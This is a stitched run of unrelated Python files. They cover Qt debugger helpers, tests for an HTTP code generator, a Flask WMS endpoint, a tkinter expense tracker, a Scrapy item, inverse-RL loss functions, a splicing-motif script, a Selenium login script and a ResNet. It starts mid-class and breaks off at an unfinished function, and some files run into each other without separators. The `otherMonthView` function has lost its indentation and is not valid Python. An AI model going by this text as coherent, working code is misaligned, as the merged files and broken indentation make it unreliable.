        self.settings.setValue(self.name, self.isChecked())
def get_resources_dir() -> str:
    """Return the path of the ``resources`` directory next to this module."""
    return os.path.join(os.path.dirname(__file__), "resources")
def wait_input_ready(
    debug_process: "pexpect.spawn", lang: str, timeout: Optional[float] = None
):
    """Block until the debugger prompt appears on *debug_process*.

    Waits for the ``(Pdb)`` prompt for python3 and the ``(gdb)`` prompt
    otherwise (gdb / rust-gdb).  A pexpect timeout exception propagates
    if the prompt does not appear within *timeout* seconds.

    Fix: the expect patterns are now raw strings — ``"\\("`` in a plain
    literal is an invalid escape sequence (DeprecationWarning); the
    annotation is a string so the function can be defined without the
    pexpect import for type-checking-only use.
    """
    if lang == "python3":
        debug_process.expect(r"\(Pdb\)", timeout=timeout)
    else:
        debug_process.expect(r"\(gdb\)", timeout=timeout)
def get_executing_line(lang: str, line: str) -> Optional[int]:
    """Extract the current source line number from a debugger output line.

    python3 (pdb): only ``...<module>()`` frame lines carry a usable
    number, taken from the first parenthesised group.  Other languages
    (gdb): the number is the tab-separated first field.  Returns None
    when no line number can be extracted.
    """
    if lang != "python3":
        head = line.split("\t")[0]
        try:
            return int(head)
        except ValueError:
            return None
    if not line.endswith("<module>()"):
        return None
    match = re.search(r"(\()(.*?)\)", line)
    # NOTE(review): assumes the pattern matches whenever the suffix check
    # passed; a non-matching line would raise AttributeError (unchanged
    # from the original behaviour).
    return int(match.groups()[-1])
class WriteObj(object):
    """Message container queued to the console writer.

    ``msg`` is the payload (bytes or str); ``mode`` is a rendering hint
    for the consumer, "" meaning the default rendering.
    """

    def __init__(self, msg: Union[bytes, str], mode: str = ""):
        self.msg = msg
        self.mode = mode
# Serialises Commander runs so only one external command writes to the
# console at a time.
OJ_MUTEX = QMutex()
class Commander(QThread):
    """Worker thread that runs one external command and streams its output
    to ``console`` via ``writeLnSignal``.

    Set ``cmd`` (argv accepted by subprocess) before calling ``start()``.
    """

    def __init__(self, console):
        super().__init__()
        self.console = console
        self.cmd = ""

    def run(self):
        OJ_MUTEX.lock()
        try:
            try:
                out = subprocess.check_output(
                    self.cmd, stderr=subprocess.STDOUT
                ).decode()
                self.console.writeLnSignal.emit(out)
            except subprocess.CalledProcessError as err:
                # Fix: decode so the signal always carries str — the
                # success path emits str but ``err.output`` is bytes.
                self.console.writeLnSignal.emit(err.output.decode())
            # Keep the console scrolled to the newest output.
            scroll_bar = self.console.verticalScrollBar()
            scroll_bar.setValue(scroll_bar.maximum())
        finally:
            # Fix: always release the mutex — an unexpected exception
            # (e.g. command not found) previously left it locked and
            # deadlocked every later Commander.
            OJ_MUTEX.unlock()
|
"""Tests for Python requests implementation generators."""
import os
import pytest
from http_request_codegen import generate_http_request_code
from tests.combinations import (
combination_arguments_to_kwargs,
get_argument_combinations,
)
# Absolute paths of the per-method directories holding the expected-output
# case files (one file per argument combination).
CASES_DIRS = {
    method: os.path.abspath(os.path.join(os.path.dirname(__file__), method))
    for method in ['GET', 'POST']
}
@pytest.mark.parametrize(
    'args_group',
    get_argument_combinations(method='GET', dirpath=CASES_DIRS['GET']),
    ids=lambda args_group: os.path.basename(args_group['filename']),
)
def test_python_requests_get(args_group):
    """Generated GET snippet must match the stored expected-output file."""
    with open(args_group['filename']) as f:
        expected_result = f.read()
    result = generate_http_request_code(
        'python', 'requests', 'GET',
        **combination_arguments_to_kwargs(args_group['arguments']),
    )
    assert result == expected_result
@pytest.mark.parametrize(
    'args_group',
    get_argument_combinations(method='GET', dirpath=CASES_DIRS['GET']),
    ids=lambda args_group: os.path.basename(args_group['filename']),
)
def test_python_requests_get__response(args_group, assert_request_args):
    """Execute the generated GET snippet and verify the request it sends."""
    result = generate_http_request_code(
        'python', 'requests', 'GET',
        **combination_arguments_to_kwargs(args_group['arguments']),
    )
    # Some snippet variants omit the import line; prepend it so the
    # snippet is runnable standalone.
    if 'import requests' not in result:
        result = 'import requests\n\n%s' % result
    namespace = {}
    # Runs the generated snippet, which must bind ``req`` (the Response).
    # exec is acceptable here: the input is produced by this project.
    exec(result, namespace)
    assert_request_args(args_group['arguments'], namespace['req'].json())
@pytest.mark.parametrize(
    'args_group',
    get_argument_combinations(method='POST', dirpath=CASES_DIRS['POST']),
    ids=lambda args_group: os.path.basename(args_group['filename']),
)
def test_python_requests_post(args_group):
    """Generated POST snippet must match the stored expected-output file."""
    with open(args_group['filename']) as f:
        expected_result = f.read()
    result = generate_http_request_code(
        'python', 'requests', 'POST',
        **combination_arguments_to_kwargs(args_group['arguments']),
    )
    assert result == expected_result
@pytest.mark.parametrize(
    'args_group',
    get_argument_combinations(method='POST', dirpath=CASES_DIRS['POST']),
    ids=lambda args_group: os.path.basename(args_group['filename']),
)
def test_python_requests_post__response(
    args_group, assert_request_args,
    create_request_args_files,
):
    """Execute the generated POST snippet and verify the request it sends."""
    result = generate_http_request_code(
        'python', 'requests', 'POST',
        **combination_arguments_to_kwargs(args_group['arguments']),
    )
    if 'import requests' not in result:
        result = 'import requests\n\n%s' % result
    # Create files, if needed (multipart/file-upload cases)
    files = create_request_args_files(args_group)
    namespace = {}
    # Runs the generated snippet, which must bind ``req`` (the Response).
    exec(result, namespace)
    assert_request_args(args_group['arguments'], namespace['req'].json())
    # Clean up the temporary upload files created above.
    for f in files:
        f.close()
        os.remove(f.name)
|
"""
The Web Map Service (WMS) provides a simple HTTP interface for requesting
geo-registered map images from one or more distributed geospatial databases.
(source : https://www.ogc.org/standards/wms#schemas)
The three operations defined for a WMS are :
* GetCapabilities (to obtain service metadata) [MANDATORY],
* GetMap (to obtain the map) [MANDATORY],
* and GetFeatureInfo [OPTIONAL].
For more information about the WMS, see https://portal.ogc.org/files/?artifact_id=14416.
"""
import json
from flask import Response, abort, request
from flask_restx import Namespace, Resource
from app.common import path
from app.models.wms import utils
from app.models.wms.capabilities import get_capabilities
from app.models.wms.map import get_map_image, get_mapnik_map_for_feature_info
# Flask-RESTX namespace for the WMS-compatible endpoint.
api = Namespace("wms", "WMS compatible endpoint")
# @api.response(400, "Couldn't find the requested method")
class WMS(Resource):
    """Single REST resource dispatching the three WMS operations.

    WMS multiplexes GetCapabilities, GetMap and GetFeatureInfo over one
    URL, selected by the ``request`` query parameter.
    """

    def get(self):
        """Dispatch a WMS GET call based on its ``request`` parameter."""
        # WMS parameter names are case-insensitive: normalise keys once.
        normalized_args = {k.lower(): v for k, v in request.args.items()}
        service = normalized_args.get("service")
        if service != "WMS":
            # Be lenient: force the expected service instead of rejecting.
            normalized_args["service"] = "WMS"
        request_name = normalized_args.get("request")
        if request_name == "GetMap":
            return self.get_map(normalized_args)
        if request_name == "GetCapabilities":
            return self.get_capabilities(normalized_args)
        if request_name == "GetFeatureInfo":
            return self.get_feature_info(normalized_args)
        return abort(
            400,
            "Couldn't find the requested method {}, "
            "request parameter needs to be set".format(request_name),
        )

    def get_capabilities(self, _):
        """Return the service metadata as XML (WMS GetCapabilities)."""
        capabilities = get_capabilities()
        if capabilities is None:
            abort(404)
        return Response(capabilities, mimetype="text/xml")

    def get_map(self, normalized_args):
        """Return the map rendered in the client-requested image format."""
        image = get_map_image(normalized_args)
        if image is None:
            abort(404)
        mapnik_format, mime_format = utils.parse_format(normalized_args)
        return Response(image.tostring(mapnik_format), mimetype=mime_format)

    def get_feature_info(self, normalized_args):
        """Implement the GetFeatureInfo entrypoint for the WMS endpoint"""
        # TODO: fix this to output text, xml and json !
        # currently, only support application/json as mimetype
        if normalized_args["info_format"] != "application/json":
            abort(400, "this endpoint doesn't support non json return value")
        mp = get_mapnik_map_for_feature_info(normalized_args)
        if mp is None:
            abort(404)
        mp.zoom_to_box(utils.parse_envelope(normalized_args))
        raw_query_layers = normalized_args.get("query_layers", "")
        query_layers = utils.parse_list(raw_query_layers)
        # The query must name exactly the layers present on the map.
        if set(query_layers) != {layer.name for layer in mp.layers}:
            abort(400, "Requested layer didnt match the query_layers parameter")
        features = {"features": []}
        for layerindex, mapnick_layer in enumerate(mp.layers):
            mapnick_layer.queryable = True
            # NOTE(review): ``type`` shadows the builtin; kept unchanged.
            (type, _, variable, _, _) = path.parse_unique_layer_name(mapnick_layer.name)
            position = utils.parse_position(normalized_args)
            layer_features = []
            variable_found = None
            featureset = mp.query_map_point(layerindex, position.x, position.y)
            for feature in featureset:
                geojson = json.loads(feature.to_geojson())
                layer_features.append(geojson)
                # Vector layers: keep hits only if some feature carries the
                # requested variable property.
                if (type == path.VECTOR) and not (variable_found):
                    variable_found = ("properties" in geojson) and (
                        f"__variable__{variable}" in geojson["properties"]
                    )
            if (type == path.AREA) or variable_found:
                features["features"].extend(layer_features)
        return features
|
from tkinter import ttk, Text, Label, Entry, StringVar
import tkinter as tk
from tkinter.constants import BOTTOM, TOP
from .db import database # Import Database class
import re
import inspect
databaseConnector = database()  # Shared Database handle used by every view/helper below
def monthView(root):
    """Open a window listing the current month's records in a 7-column
    tree, plus a search box for loading other months."""
    monthWindow = tk.Toplevel(root, width=900, height=500)
    monthWindow.title("Expenses Calendar for {}".format(databaseConnector.currentDate))
    # Setup the output Tree (one column per transaction field)
    tree = ttk.Treeview(monthWindow, column=("c1", "c2", "c3", "c4", "c5", "c6", "c7"), show='headings')
    tree.column("#1", anchor=tk.CENTER)
    tree.heading("#1", text="Date")
    tree.column("#2", anchor=tk.CENTER)
    tree.heading("#2", text="Incomes")
    tree.column("#3", anchor=tk.CENTER)
    tree.heading("#3", text="Expenses")
    tree.column("#4", anchor=tk.CENTER)
    tree.heading("#4", text="Added to Piggy")
    tree.column("#5", anchor=tk.CENTER)
    tree.heading("#5", text="Got from Piggy")
    tree.column("#6", anchor=tk.CENTER)
    tree.heading("#6", text="Owed Money")
    tree.column("#7", anchor=tk.CENTER)
    tree.heading("#7", text="Comments")
    tree.pack(fill="x")
    # Search widgets: label + free-text entry for "<month> <year>"
    monthLabel=StringVar()
    monthLabel.set("Search records from other months ")
    labelDir=Label(monthWindow, textvariable=monthLabel, height=4)
    labelDir.pack(side="left")
    directory=StringVar(None)
    dirname=Entry(monthWindow,textvariable=directory,width=50)
    dirname.pack(side="left")
    #otherMonthView(monthWindow, tree, True, "") # Run first time for current month
    monthBtn = tk.Button(
        monthWindow, #obj
        command=lambda:otherMonthView(monthWindow, tree, False, directory.get()), # function
        textvariable= "", font="Calibri",text= "Search" , bg= "#3EA055", fg="white", height=1, width= 15 #style
    )
    monthBtn.pack(pady=15)
# Each function now calls popUpManager that will check which function called it and manage the values
def addMoney(root):
    """Prompt for a new income amount (delegates to popUpManager)."""
    try:
        popUpManager(root, "Added a new Income", "Insert amount")
    except:  # NOTE(review): bare except also hides unrelated errors
        error(root, "You have to provide a number to the amount you want to add!!")
def addCost(root):
    """Prompt for a new expense amount (delegates to popUpManager)."""
    try:
        popUpManager(root, "Add a new expense", "Add expense amount")
    except:
        error(root, "You have to provide a number to the amount you want to add!!")
def add2Piggy(root):
    """Prompt for an amount to move into the piggy bank."""
    try:
        popUpManager(root, "Add money to your Piggy bank", "Insert amount")
    except:
        error(root, "You have to provide a number to the amount you want to add to your Piggy bank!!")
def getPiggy(root):
    """Prompt for an amount to take out of the piggy bank."""
    try:
        popUpManager(root, "Get money from your Piggy bank", "Insert amount")
    except:
        error(root, "You have to provide a number to the amount you want to get to your Piggy bank!!")
def oweMoney(root):
    """Prompt for a new debt amount."""
    try:
        popUpManager(root, "Add a new dept", "Insert amount")
    except:
        error(root, "You have to provide a number to the amount that you have to pay back!!")
def otherMonthView(root, tree, initFLG, usrInput = ""):
# Check if the user provided a string, if so give to the parser to check it
parsedMonth = ""
if usrInput != "":
parsedMonth = dateParse(usrInput)
if parsedMonth == "" and not initFLG:
error(root,"Something went wrong...\nPlease check your format and try again...\nExample: For may of 2021 type 'may 2021' !!")
else:
MonthInfo = databaseConnector.getFromDB(parsedMonth,"")
for date in MonthInfo:
tree.insert("", tk.END, values=date)
return parsedMonth
def dateParse(provided):
    """Parse a user-supplied "<month> <year>" string into "<mon><year>".

    Example: "May 2021" -> "may2021".  The first token only needs to
    contain a known three-letter month abbreviation ("january" -> "jan")
    and the second token must contain a four-digit year (1000-3999).
    Returns "" for any input that does not match.

    Fixes: the original relied on the truthiness of ``str.find`` (which
    is -1, i.e. truthy, when no space is present) and forced failures
    with ``print(1/0)``; both replaced by explicit checks.
    """
    months = ["jan", "feb", "mar", "apr", "may", "jun", "jul", "aug", "sep", "oct", "nov", "dec"]
    try:
        parts = provided.split(" ")
        if len(parts) < 2:
            return ""
        # Validate the year token (original pattern kept: a four-digit
        # year anywhere in the token is accepted).
        if re.match(r'.*([1-3][0-9]{3})', parts[1]) is None:
            return ""
        name = parts[0].lower()
        for month in months:
            if month in name:
                return str(month + parts[1])
    except Exception:
        # e.g. non-string input: behave like the original and fail soft.
        pass
    return ""
def add2DB(root, income: float, outcome: float, toPiggy: float, fromPiggy: float, oweMoney: float, note: str):
    """Persist one transaction row and refresh the month view."""
    try:
        # Is used by every button that adds to the database
        income = databaseConnector.addToDatabase(
            income, # income
            outcome, # outcome
            toPiggy, # money moved into the piggy bank
            fromPiggy, # money taken out of the piggy bank
            oweMoney, # owed money
            note # free-text comment
        )
        monthView(root)
    except:  # NOTE(review): bare except hides the real DB error
        error(root,"Something went wront!\nPlease try again..")
def popUpManager(root, titleVal,labelVal):
    """Open an amount+comment popup and wire its button to addButtonCall.

    The caller's function name (captured via ``inspect``) decides which
    transaction field the entered amount is routed to.
    """
    popUp = tk.Toplevel(root)
    popUp.title(titleVal)
    # Amount label + entry
    label=StringVar()
    label.set(labelVal)
    costLabelSet = Label(popUp, textvariable=label, height=4)
    costLabelSet.pack(side="left")
    userInput=StringVar(None)
    userInput.set(0)
    costValSet = Entry(popUp,textvariable=userInput,width=25)
    costValSet.pack(side="left")
    # Comment label + entry
    noteLabel=StringVar()
    noteLabel.set("Add Comment")
    noteLabelSet = Label(popUp, textvariable=noteLabel, height=4)
    noteLabelSet.pack(side="left")
    noteText=StringVar(None)
    noteTextSet = Entry(popUp,textvariable=noteText,width=50)
    noteTextSet.pack(side="left")
    # init values
    ## will only change one of these depending on what transaction the user wants
    income = 0.0
    outcome = 0.0
    toPiggy = 0.0
    fromPiggy = 0.0
    oweMoney = 0.0
    # Now we will get the name of the caller function with the 3 lines here
    # This will store the name of the function to callerFunction
    # which we check with a simple if elif to see which one it was
    # and after that store the amount the user gave to the according variable
    curframe = inspect.currentframe()
    calframe = inspect.getouterframes(curframe, 2)
    callerFunction = str(calframe[1][3])
    addButton= tk.Button(
        popUp, #obj
        # We now call a function providing all the DB values as well as the string value of the caller function
        # This is because we now need a new check on the Text widget to occur AFTER the button is pressed and check if it's a float
        # if we just pass the data directly to the DB it has NOT updated the value from the text widget, we need a way to re-gain that !!
        command=lambda:addButtonCall(root, callerFunction, str(userInput.get()),income, outcome, toPiggy, fromPiggy, oweMoney, str(noteText.get())), # function
        textvariable= "", font="Calibri",text= "Add Amount" , bg= "#3EA055", fg="white", height=1, width= 15 #style
    )
    addButton.pack(pady= 25,padx= 15)
def addButtonCall(root, callerFunction, userInput, income, outcome, toPiggy, fromPiggy, oweMoney, note):
    """Route the popup amount to the transaction field selected by
    *callerFunction*, then persist via add2DB."""
    # this function is only called from the popUpManager
    # the purpose is once the button is pressed to make it check the Text widgets value and send it to the DB after it checks it
    # NOTE(review): a non-numeric input raises ValueError here and no
    # caller catches it (the try in addMoney & co. has already returned).
    userInput = float(userInput) # Convert user input to float
    # NOTE(review): always True once float() above succeeded.
    if isinstance(userInput, float):
        if callerFunction == "addMoney":
            income = userInput
        elif callerFunction == "addCost":
            outcome = userInput
        elif callerFunction == "add2Piggy":
            toPiggy = userInput
        elif callerFunction == "getPiggy":
            fromPiggy = userInput
        elif callerFunction == "oweMoney":
            oweMoney = userInput
        valueList = [income, outcome, toPiggy, fromPiggy, oweMoney]
        if not all(isinstance(x, float) for x in valueList):
            error(root, "You have to provide a number to the amount you want to add!!")
            # NOTE(review): deliberate ZeroDivisionError used as a control-flow
            # abort; nothing catches it at this call depth.
            print(1/0)
        else:
            add2DB(root, income, outcome, toPiggy, fromPiggy, oweMoney, note)
def error(root, text):
    """Show *text* in a small error window with an Exit button."""
    errorWindow = tk.Toplevel(root, width=300, height=300)
    errorWindow.title("Error")
    # NOTE(review): pack() returns None, so ``header`` is always None.
    header = tk.Label(errorWindow, text = text).pack()
    exit_button = tk.Button(errorWindow, text="Exit", command=errorWindow.destroy)
    exit_button.pack(pady=20)
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class EventItem(scrapy.Item):
    """Scraped event record: identity, schedule, location and provenance."""
    # Structure
    id = scrapy.Field()
    # What
    name = scrapy.Field()
    url = scrapy.Field()
    imgList = scrapy.Field()    # thumbnail image (list page)
    imgDetail = scrapy.Field()  # full-size image (detail page)
    # When
    dateStart = scrapy.Field()
    dateEnd = scrapy.Field()
    # Where
    country = scrapy.Field()
    city = scrapy.Field()
    locality = scrapy.Field()
    address = scrapy.Field()
    coordinate = scrapy.Field()
    place = scrapy.Field()
    zone = scrapy.Field()
    # Spider (provenance of the scrape)
    spiderName = scrapy.Field()
    spiderSource = scrapy.Field()
    # Extra
    extras = scrapy.Field()
|
import numpy as np
import torch
import torch.nn.functional as F
def f_div_loss(div: str, IS: bool, samples, rho_expert, agent_density, reward_func, device):
    """Surrogate gradient objective for f-divergence state-marginal IRL.

    div:     'fkl' | 'rkl' | 'js' — which f-divergence to optimise.
    IS:      if True, weight trajectories with self-normalised importance
             sampling based on current reward minus behaviour log-prob.
    samples: tuple (states, _, log_action_probs); states is (N, T, d).
    rho_expert:    callable returning expert state density for (M, d) rows.
    agent_density: density model with ``score_samples`` returning
                   log-density (sklearn-KDE-style — TODO confirm).
    reward_func:   reward model exposing ``r`` (differentiable) and
                   ``get_scalar_reward`` (detached, numpy).

    Returns (surrogate_objective, t1 / T); the second value is the
    per-trajectory mean of the (negated) f-term.
    """
    # please add eps to expert density, not here
    assert div in ['fkl', 'rkl', 'js']
    s, _, log_a = samples
    N, T, d = s.shape
    s_vec = s.reshape(-1, d)
    # log(p_expert / q_agent) for every visited state
    log_density_ratio = np.log(rho_expert(s_vec)) - agent_density.score_samples(s_vec).reshape(-1)
    log_density_ratio = torch.FloatTensor(log_density_ratio).to(device)
    if div == 'fkl':
        t1 = torch.exp(log_density_ratio) # (N*T,) p/q TODO: clip
    elif div == 'rkl':
        t1 = log_density_ratio # (N*T,) log (p/q)
    elif div == 'js':
        t1 = F.softplus(log_density_ratio) # (N*T,) log (1 + p/q)
    t1 = (-t1).view(N, T).sum(1) # NOTE: sign (N,)
    t2 = reward_func.r(torch.FloatTensor(s_vec).to(device)).view(N, T).sum(1) # (N,)
    if IS:
        traj_reward = reward_func.get_scalar_reward(s_vec).reshape(N, T).sum(1) # (N,)
        traj_log_prob = log_a.sum(1) # (N,)
        IS_ratio = F.softmax(torch.FloatTensor(traj_reward - traj_log_prob), dim=0).to(device) # normalized weight
        # weighted covariance estimate of Cov(t1, t2)
        surrogate_objective = (IS_ratio * t1 * t2).sum() - (IS_ratio * t1).sum() * (IS_ratio * t2).sum()
    else:
        surrogate_objective = (t1 * t2).mean() - t1.mean() * t2.mean() # sample covariance
    surrogate_objective /= T
    return surrogate_objective, t1 / T # log of geometric mean w.r.t. traj (0 is the borderline)
def maxentirl_loss(div: str, agent_samples, expert_samples, reward_func, device):
    """MaxEnt-IRL surrogate (FKL in trajectory space): E_q[r] - E_p[r].

    agent_samples is a tuple whose first entry is a (N, T, d) numpy array
    of agent states; expert_samples is a (N, T, d) or (N, d) numpy array.
    The result is scaled by the horizon T so it matches the trajectory
    scale of the other losses (gradient-ascent objective).
    """
    assert div in ['maxentirl']
    agent_states = agent_samples[0]
    horizon, dim = agent_states.shape[1], agent_states.shape[2]

    def as_rows(states):
        # Flatten (N, T, d) / (N, d) into (M, d) float rows on `device`.
        return torch.FloatTensor(states).reshape(-1, dim).to(device)

    agent_reward = reward_func.r(as_rows(agent_states)).view(-1)    # E_q[r(tau)]
    expert_reward = reward_func.r(as_rows(expert_samples)).view(-1)  # E_p[r(tau)]
    return horizon * (agent_reward.mean() - expert_reward.mean())
def f_div_current_state_loss(div: str, samples, rho_expert, agent_density, reward_func, device):
    ''' NOTE: deprecated
    div=fkl-state is exactly maxentirl with importance sampling
    div=rkl-state,js-state are approximate SMM-IRL (no theory support)

    Per-state variant of f_div_loss: the covariance is taken over the
    N*T flattened states instead of per-trajectory sums.  Arguments are
    as in f_div_loss; returns the surrogate objective scaled by T.
    '''
    assert div in ['maxentirl', 'fkl-state', 'rkl-state', 'js-state']
    s, _, _ = samples
    N, T, d = s.shape
    s_vec = s.reshape(-1, d)
    # log(p_expert / q_agent) for every visited state
    log_density_ratio = np.log(rho_expert(s_vec)) - agent_density.score_samples(s_vec).reshape(-1)
    log_density_ratio = torch.FloatTensor(log_density_ratio).to(device)
    if div in ['maxentirl', 'fkl-state']:
        t1 = torch.exp(log_density_ratio) # (N*T,) p/q TODO: clip
    elif div == 'rkl-state':
        t1 = log_density_ratio # (N*T,) log (p/q)
    elif div == 'js-state':
        t1 = F.softplus(log_density_ratio) # (N*T,) log (1 + p/q)
    t1 = -t1 # NOTE: sign (N*T,)
    t2 = reward_func.r(torch.FloatTensor(s_vec).to(device)).view(-1) # (N*T,) not sum
    surrogate_objective = (t1 * t2).mean() - t1.mean() * t2.mean()
    return T * surrogate_objective # same scale
|
import argparse
import Functions_Features.functionsToDetermineMotifStrength as fdm
import pandas as pd
# ---- CLI arguments -------------------------------------------------------
parser = argparse.ArgumentParser()
parser.add_argument("-w","--tmpfolder",type=str,help="Input the upperlevel folder containing folder to Write to")
parser.add_argument("-t","--foldertitle",type=str,help="Input the title of the mutation file")
parser.add_argument("-m","--mutationfile",type=str,help="Input a mutation file")
parser.add_argument("-q","--quantile",nargs='?',default=0.95,type=float,help="Input a quantile value to set a threshold strength score for each motif cluster, default is 0.95")
args = parser.parse_args()
TMPfolder=args.tmpfolder
folderTitle=args.foldertitle
MUTATION_FILE=args.mutationfile
QUANTILE=args.quantile
# Number of motif clusters per splicing regulatory element (SRE) type.
dict_NumCluster={"ESE":8,"ESS":7,"ISE":7,"ISS":8}
# Per-cluster strength thresholds at the requested quantile.
strength_threshold_dict=fdm.createSREclusterThresholdDictionary(TMPfolder,dict_NumCluster,QUANTILE)
# Mutation file: tab-separated, first column is the mutation ID.
with open(MUTATION_FILE) as f:
    #with open("../data/MAPT_MUTs_ToTest.tsv") as f:
    mutations=[line.strip().split("\t") for line in f]
#mutsToIgnore=["Mut3","Mut10","Mut33"]
to_write = []
# Go through each mutation
for mut in mutations:
    mutID=mut[0]
    # Summed motif-score differences per cluster, one list per SRE type.
    ESE_motifStrengths = fdm.getSumOfMotifScoreDiffsPerSRECluster(TMPfolder,folderTitle,mutID,"ESE",dict_NumCluster["ESE"],strength_threshold_dict)
    ESS_motifStrengths = fdm.getSumOfMotifScoreDiffsPerSRECluster(TMPfolder,folderTitle,mutID,"ESS",dict_NumCluster["ESS"],strength_threshold_dict)
    ISE_motifStrengths = fdm.getSumOfMotifScoreDiffsPerSRECluster(TMPfolder,folderTitle,mutID,"ISE",dict_NumCluster["ISE"],strength_threshold_dict)
    ISS_motifStrengths = fdm.getSumOfMotifScoreDiffsPerSRECluster(TMPfolder,folderTitle,mutID,"ISS",dict_NumCluster["ISS"],strength_threshold_dict)
    motifStrengths_forMut = [mutID]+ESE_motifStrengths+ESS_motifStrengths+ISE_motifStrengths+ISS_motifStrengths
    to_write.append(motifStrengths_forMut)
# NOTE(review): the output name assumes MUTATION_FILE has at least three
# "/"-separated components (e.g. ../data/<name>.tsv) — TODO confirm.
# The join below also assumes fdm returns string scores — TODO confirm.
with open(TMPfolder+MUTATION_FILE.split("/")[2].split(".")[0]+"_SREstrengthsDifferences_perCluster.tsv","w") as fw:
    #with open(TMPfolder+motifType+"_MUTsToTest_ScoreDifferences.tsv","w") as fw:
    # Header row: MutID then one column per SRE-type/cluster pair.
    fw.write("MutID")
    for motifType in ["ESE","ESS","ISE","ISS"]:
        for cluster in range(1,dict_NumCluster[motifType]+1):
            fw.write("\t")
            fw.write(motifType+"_Cluster"+str(cluster))
    fw.write("\n")
    for i in to_write:
        fw.write("\t".join(i))
        fw.write("\n")
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
# Path of the chromedriver binary that drives the Brave browser below.
chromedriver = "/home/yongjer/下載/chromedriver"
option = webdriver.ChromeOptions()
option.binary_location = '/opt/brave.com/brave/brave'
s = Service(chromedriver)
driver = webdriver.Chrome(service=s, options=option)
# Log in to the NSYSU MOOC portal (replace the placeholder credentials).
driver.get("https://cu.nsysu.edu.tw/mooc/login.php")
# Fix: renamed from `id` (shadowed the builtin) and `passward` (typo).
username_field = driver.find_element(By.ID,"s_username")
username_field.send_keys("YourId")
password_field = driver.find_element(By.NAME,"password")
password_field.send_keys("YourPassword")
send = driver.find_element(By.ID,"btnSignIn")
send.click()
import torch
import torch.nn as nn
import torch.nn.functional as F
from einops.layers.torch import Rearrange
class BasicBlock(nn.Module):
    """3x3 + 3x3 residual block (ResNet-18/34 style).

    Output channels are ``out_channels * expansion``; a 1x1 projection
    shortcut is used whenever the spatial size or channel count changes,
    otherwise the shortcut is the identity.
    """

    expansion = 1

    def __init__(self, in_channels, out_channels, stride = 1):
        super().__init__()
        block_out = out_channels * BasicBlock.expansion
        self.residual = nn.Sequential(
            nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=stride, padding=1, bias=False),
            nn.BatchNorm2d(out_channels),
            nn.ReLU(inplace=True),
            nn.Conv2d(out_channels, block_out, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(block_out),
        )
        needs_projection = stride != 1 or in_channels != block_out
        if needs_projection:
            self.shortcut = nn.Sequential(
                nn.Conv2d(in_channels, block_out, kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(block_out),
            )
        else:
            self.shortcut = nn.Identity()
        self.final = nn.ReLU(inplace=True)

    def forward(self, x):
        out = self.residual(x) + self.shortcut(x)
        return self.final(out)
class BottleNeck(nn.Module):
    """Three-conv residual block (ResNet-50+ style), expansion 4.

    NOTE(review): the last conv uses kernel_size=3 where the canonical
    bottleneck uses 1x1 — preserved unchanged, since altering it would
    change the architecture.
    """

    expansion = 4

    def __init__(self, in_channels, out_channels, stride = 1):
        super().__init__()
        block_out = out_channels * BottleNeck.expansion
        self.residual = nn.Sequential(
            nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False),
            nn.BatchNorm2d(out_channels),
            nn.ReLU(inplace=True),
            nn.Conv2d(out_channels, out_channels, stride=stride, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(out_channels),
            nn.ReLU(inplace=True),
            nn.Conv2d(out_channels, block_out, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(block_out),
        )
        needs_projection = stride != 1 or in_channels != block_out
        self.shortcut = (
            nn.Sequential(
                nn.Conv2d(in_channels, block_out, kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(block_out),
            )
            if needs_projection
            else nn.Identity()
        )
        self.final = nn.ReLU(inplace=True)

    def forward(self, x):
        return self.final(self.residual(x) + self.shortcut(x))
class ResNet(nn.Module):
    """CIFAR-style ResNet: 3x3 stem, four residual stages, global pool.

    ``block_type`` selects 'BasicBlock' or 'BottleNeck'; ``num_block``
    gives the number of blocks in each of the four stages.  Extra
    keyword arguments are accepted and ignored.
    """

    def __init__(self, block_type, num_block, num_classes, **kwargs):
        super().__init__()
        if block_type not in ('BasicBlock', 'BottleNeck'):
            raise NotImplementedError('Invalid block type.')
        block = {'BasicBlock': BasicBlock, 'BottleNeck': BottleNeck}[block_type]
        self.num_classes = num_classes
        # Stem: keep spatial size, lift to 64 channels.
        self.layer1 = nn.Sequential(
            nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False),
            nn.BatchNorm2d(64),
            nn.ReLU(inplace=True),
        )
        self.cur_channels = 64
        # Stages 2-5: channel widths double, stages 3-5 halve resolution.
        stages = [
            self._make_layer(block, width, blocks, stride)
            for width, blocks, stride in zip(
                (64, 128, 256, 512), num_block, (1, 2, 2, 2)
            )
        ]
        self.layer2, self.layer3, self.layer4, self.layer5 = stages
        # Head: global average pool, flatten, linear classifier.
        self.final = nn.Sequential(
            nn.AdaptiveAvgPool2d((1, 1)),
            Rearrange('b c h w -> b (c h w)'),
            nn.Linear(512 * block.expansion, num_classes),
        )

    def _make_layer(self, block, out_channels, num_blocks, stride):
        """Stack *num_blocks* blocks; only the first one may downsample."""
        per_block_strides = [stride] + [1] * (num_blocks - 1)
        layers = []
        for s in per_block_strides:
            layers.append(block(self.cur_channels, out_channels, s))
            self.cur_channels = out_channels * block.expansion
        return nn.Sequential(*layers)

    def forward(self, x):
        for stage in (self.layer1, self.layer2, self.layer3, self.layer4, self.layer5):
            x = stage(x)
        return self.final(x)

    def loss(self, res, gt):
        """Cross-entropy between logits *res* and integer labels *gt*."""
        return F.cross_entropy(res, gt)
def resnet18(**kwargs):
    """ResNet-18: BasicBlock, stages of 2/2/2/2 blocks."""
    return ResNet('BasicBlock', [2, 2, 2, 2], **kwargs)
def resnet34(**kwargs):
    """ResNet-34: BasicBlock, stages of 3/4/6/3 blocks."""
    return ResNet('BasicBlock', [3, 4, 6, 3], **kwargs)
def resnet50(**kwargs):
    """ResNet-50: BottleNeck, stages of 3/4/6/3 blocks."""
    return ResNet('BottleNeck', [3, 4, 6, 3], **kwargs)
def resnet101(**kwargs):
    """ResNet-101: BottleNeck, stages of 3/4/23/3 blocks."""
    return ResNet('BottleNeck', [3, 4, 23, 3], **kwargs)
def resnet152(**kwargs):
